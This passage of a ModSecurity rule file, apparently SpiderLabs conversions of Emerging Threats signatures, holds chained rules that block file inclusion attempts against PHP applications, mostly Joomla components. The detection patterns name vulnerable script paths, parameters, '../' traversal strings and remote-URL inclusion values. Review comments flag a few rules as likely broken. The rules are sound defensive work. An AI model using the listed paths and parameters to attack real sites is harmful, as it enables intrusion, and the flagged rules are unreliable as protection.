REQUEST_LINE "@contains /portal_block.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008964,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS lcxBBportal Alpha portal_block.php phpbb_root_path parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32647'" SecRule REQUEST_LINE 
"@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:phpbb_root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS lcxBBportal Alpha portal_block.php phpbb_root_path parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008965) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS lcxBBportal Alpha acp_lcxbbportal.php phpbb_root_path parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /acp_lcxbbportal.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008965,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS lcxBBportal Alpha acp_lcxbbportal.php phpbb_root_path parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32647'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:phpbb_root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS lcxBBportal Alpha acp_lcxbbportal.php phpbb_root_path parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009381) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Interact embedforum.php Remote File Inclusion SecRule REQUEST_LINE "@contains /embedforum.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009381,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Interact embedforum.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28996'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CONFIG[LANGUAGE_CPATH]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Interact embedforum.php Remote File 
Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009386) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Interact lib.inc.php Remote File Inclusion
# NOTE(review): TX:'/.../' selects TX entries by regular expression, so the
# unescaped "[BASE_PATH]" in the last condition is a character class, not
# literal brackets. If the generic RFI rule stores its marker under a name
# ending in "ARGS:CONFIG[BASE_PATH]" (TODO confirm against the rule that sets
# tx.<id>-WEB_ATTACK/RFI-*), the count stays 0 and this chain never completes;
# escaped brackets look intended.
SecRule REQUEST_LINE "@contains /scorm/lib.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009386,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Interact lib.inc.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28996'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:CONFIG[BASE_PATH]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Interact lib.inc.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011140) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JE Ajax Event Calendar view Parameter Local File Inclusion Attempt
# Chain: the request line contains /index.php, "GET " and
# "option=com_jeajaxeventcalendar&", and the view argument contains "../".
# NOTE(review): only the chain starter lists t: transformations; confirm what
# the chained conditions inherit, otherwise only the literal "../" form matches.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011140,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS JE Ajax Event Calendar view Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_jeajaxeventcalendar&" "chain"
SecRule ARGS:view "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JE Ajax Event Calendar view Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2008651) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JMweb MP3 src Multiple Local File Inclusion
# NOTE(review): the only REQUEST_LINE test is "@contains GET ", so no script
# path narrows this chain, and the two chained conditions are the same test
# (&TX:'/RFI.*ARGS:src/' "@gt 0") written twice. The msg says Local File
# Inclusion, yet the conditions count RFI markers for an argument named src and
# never look for "../". Presumably a path condition was lost when the signature
# was converted; confirm against the advisory referenced in the tag before
# relying on this rule.
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008651,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS JMweb MP3 src Multiple Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6669/'"
SecRule &TX:'/RFI.*ARGS:src/' "@gt 0" "chain"
SecRule &TX:'/RFI.*ARGS:src/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JMweb MP3 src Multiple Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009508) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Job2C windetail.php adtype Parameter Local File Inclusion
# Chain: the request line contains /windetail.php and "GET ", and the adtype
# argument contains "../".
SecRule REQUEST_LINE "@contains /windetail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009508,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Job2C windetail.php adtype Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34537'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:adtype "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Job2C windetail.php adtype Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009509) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Job2C detail.php adtype Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /detail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009509,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Job2C detail.php adtype Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34537'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:adtype "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Job2C detail.php adtype
Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008822) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008822,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6980/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_pro_desk" "chain" SecRule &TX:'/RFI.*ARGS:include_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009369) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /admin.rssreader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009369,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7096/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_live_site/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # 
(2009929) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt SecRule ARGS_NAMES "(?i:target)" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009929,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9706/'" SecRule REQUEST_LINE "@contains /index.php?option=com_album&" "chain" SecRule REQUEST_LINE "@contains Itemid=128&" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009933) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Mambo/Joomla! com_koesubmit Component 'koesubmit.php' Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_koesubmit/koesubmit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009933,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Mambo/Joomla! com_koesubmit Component \'koesubmit.php\' Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.owasp.org/index.php/PHP_File_Inclusion'" SecRule QUERY_STRING|REQUEST_BODY "(?i:\x2Ephp\x3F.{0,300}\x3D(http\x3A|ftp\x3A|https\x3A|ftps\x3A))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Mambo/Joomla! 
com_koesubmit Component \'koesubmit.php\' Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009934) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /components/com_moofaq/includes/file_includer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009934,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/8898/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010260) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla AjaxChat Component ajcuser.php GLOBALS Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_ajaxchat/tests/ajcuser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010260,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla AjaxChat Component ajcuser.php GLOBALS Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla AjaxChat Component ajcuser.php GLOBALS Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010474) 
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla eZine Component d4m_ajax_pagenav.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_ezine/class/php/d4m_ajax_pagenav.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010474,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla eZine Component d4m_ajax_pagenav.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37043'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla eZine Component d4m_ajax_pagenav.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010620) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mamboleto Joomla component mamboleto.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /acomponents/com_mamboleto/mamboleto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010620,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Mamboleto Joomla component mamboleto.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10369'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mamboleto Joomla component mamboleto.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-comments-post.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mojo/wp-comments-post.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010659,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-comments-post.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37179'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-comments-post.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010660) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-trackback.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mojo/wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010660,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-trackback.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37179'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-trackback.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010780) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mediaslide/viewer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010780,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37440'" 
SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_intuit/models/intuit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010833,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10730'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:approval "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010848) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_morfeoshow/morfeoshow.html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010848,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010942,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11088'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jcollection&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010989) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010989,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37987'" SecRule REQUEST_LINE "@contains /index.php?option=com_ccnewsletter&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010996) SpiderLabs 
Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010996,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11511'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_communitypolls&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011017) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jcalpro cal_popup.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_jcalpro/cal_popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011017,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jcalpro cal_popup.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/joomlajcalpro-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jcalpro cal_popup.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011067) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt SecRule 
REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011067,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_wgpicasa&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011131) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla jwmmxtd Component mosConfig_absolute_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /administrator/components/com_jwmmxtd/admin.jwmmxtd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011131,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla jwmmxtd Component mosConfig_absolute_path Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla jwmmxtd Component mosConfig_absolute_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011132) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_universal Component Remote File Inclusion SecRule REQUEST_LINE "@contains /administrator/components/com_universal/includes/config/config.html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011132,rev:2,msg:'SLR: ET 
WEB_SPECIFIC_APPS Joomla com_universal Component Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,38949'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_universal Component Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009383) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /config.dadamail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009383,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7002/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[mosConfig_absolute_path] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009384) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /config.dadamail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009384,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7002/'" SecRule REQUEST_LINE 
